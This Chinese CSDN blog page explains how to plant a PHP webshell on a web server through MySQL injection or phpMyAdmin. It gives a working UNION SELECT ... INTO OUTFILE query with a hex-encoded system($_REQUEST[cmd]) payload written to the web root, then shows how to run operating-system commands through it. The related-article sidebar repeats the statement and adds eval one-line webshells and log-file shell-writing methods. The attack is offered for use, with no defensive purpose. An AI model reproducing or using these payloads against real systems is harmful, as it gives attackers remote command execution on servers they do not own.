通过mysql能植入木马_通过Mysql的语句生成后门木马的方法_MySQL

最新推荐文章于 2022-08-25 20:28:33 发布
最新推荐文章于 2022-08-25 20:28:33 发布
阅读量142 收藏
点赞数
文章标签: 通过mysql能植入木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42515339/article/details/113341875
版权

通过Mysql 的语句生成后门木马的方法!

SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

2 3

再通过 http://www.xxx.com/cmd.php?cmd=dir c: 就可以执行系统DOS命令!

哪串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么东西?

就是的十六进制编码了,如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行的了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!

f68f2add0b68e4f9810432fce46917b7.png

相关标签: 木马

本文原创发布php中文网,转载请注明出处,感谢您的尊重!

in whitney
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP实现的通过参数生成MYSQL语句类完整实例
10-22
主要介绍了PHP实现的通过参数生成MYSQL语句类,结合完整实例形式分析了生成MYSQL语句类的实现与使用技巧,需要的朋友可以参考下
MySQL注入之木马上传拿webshell
热门推荐
Jim的博客
08-15 1万+
原理:利用MySQL中的写命令into outfile(固定式:select A into outfile B),在目标Web虚拟路径D:/WWW/下面生成一个木马文件  工具:中国菜刀 1.首先查找SQL注入点 使用单引号'报错,使用and 1=1页面正常和and 1=2页面不正常,来判断存在SQL注入 2.使用order by猜测字段数量 ?id=1+order+by+2--+
SQL注入MySQL中写入木马getshell的两种方法
qq_41187177的博客
09-09 4006
SQL注入MySQL中写入木马getshell的两种方法 1.利用into outfile直接写入木马文件 利用条件: 1.知道网站的绝对路径 2.secure_file_priv不能为null 3.具有写入文件的权限 案例: 1.利用into outfile写入木马文件 select "<?php eval($_POST['cmd']);?>" into outfile "D:\\phpstudy_pro\\WWW\\shell.php" 2.利用日志文件写入木马 1.开启日志功能 set
通过mysql植入木马_通过Mysql语句生成后门木马方法
weixin_33509600的博客
01-19 120
通过Mysql语句生成后门木马方法!SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'通过M...
复现mysql 备份上传木马,并用shell工具连接操作
weixin_64655821的博客
08-25 317
复现mysql 备份上传木马,并用shell工具连接操作
mysql写入木马getshell总结
orange777
02-25 5081
1、select into outfile写入木马 2、SQL语句利用日志写shell 3、sqlmap写入一句话getshell
Mysql中的find_in_set的使用方法介绍
12-15
使用举例: 用户表(user)中的一个字段(purview)代表该用户的权限 将用户的所有权限id存入此字段。比如有:1,2,3,4,5这样的五... 您可能感兴趣的文章:mysql通过find_in_set()函数实现where in()顺序排序Mysql中FIND_IN_S
mysql.rar_mysql语句
09-19
mysql中的一些基本语句,包括增加、删除、修改等功能,可以重复使用。
MySQL.rar_mysql语句
09-21
MySQL语法语句大全,这是多年我收集整理出来的实用文档
MYSQL语句写入.zip_MYSQL语句写入
09-21
MYSQL语句标准化写入,最基础的一个写入程序。。。
mysql 数据库留后门,运用Mysql语句生成后门木马的具体方法
weixin_35460054的博客
03-17 762
通过Mysql语句生成后门木马方法:SELECT * FROM `vbb_strikes` WHERE 1 union select2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3Efrom vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'通过Mys...
php mysql 注入一句话木马_渗透技术--SQL注入写一句话木马原理
weixin_39800387的博客
02-19 2201
讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子:SELECT * INTO OUTFILE 'C:\log1.txt'这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面。利用这个原理我们可以把PHP的一句话木马写到磁盘上从而拿到webshell。本地的目标站点来实战一下,我们的目的是在目...
mysql插入木马_运用Mysql语句生成后门木马的具体方法_mysql
weixin_42316952的博客
01-27 298
通过mysql语句生成后门木马方法:以下为引用的内容:SELECT * FROM `vbb_strikes` WHERE 1 union select2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3Efrom vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd....
mysql写入一句话木马
Websec
07-16 1万+
前提: root权限,知道了服务器的web的绝对路径,尝试写入一句话 mysql查询语句执行:select "&lt;?php @eval($_POST['pass']);?&gt;" INTO OUTFILE "D:\Wamp\2.php" 注意事项: 1、绝对路径的猜解 2、INTO OUTFILE 后面的"D:\Wamp\2.php",有的时候需要变成“D:\\Wamp\\2.ph...
mysql 木马_用Mysql语句生成后门木马方案
weixin_42509847的博客
01-25 264
下面的文章主要是介绍又如何通过MySQL(和PHP搭配之***组合) 的Mysql语句生成后门木马的具体操作方法!以下的文章主要是通过相关代码的方式来引出Mysql语句生成后门木马的具体操作方案。SELECT*FROM`vbb_strikes`WHERE1unionselect2,3,0x3C3F7068702073797374656D28245F524551554553545B...
mysql木马_用Mysql语句生成后门木马的具体方法
weixin_42456372的博客
02-08 113
通过Mysql语句生成后门木马方法:SELECT * FROM `vbb_strikes` WHERE 1 union select2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3Efrom vbb_strikes into outfile "c:/inetpub/wwwroot/cmd.php"通过Mys...
mysql数据库执行语句_mysql中记录SQL执行语句方法
最新发布
06-01
MySQL中,可以通过开启general_log来记录SQL执行语句。具体方法为: 1. 修改MySQL配置文件my.cnf,在[mysqld]下添加如下行: ``` general_log=ON general_log_file=/var/log/mysql/mysql.log ``` 其中,general...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值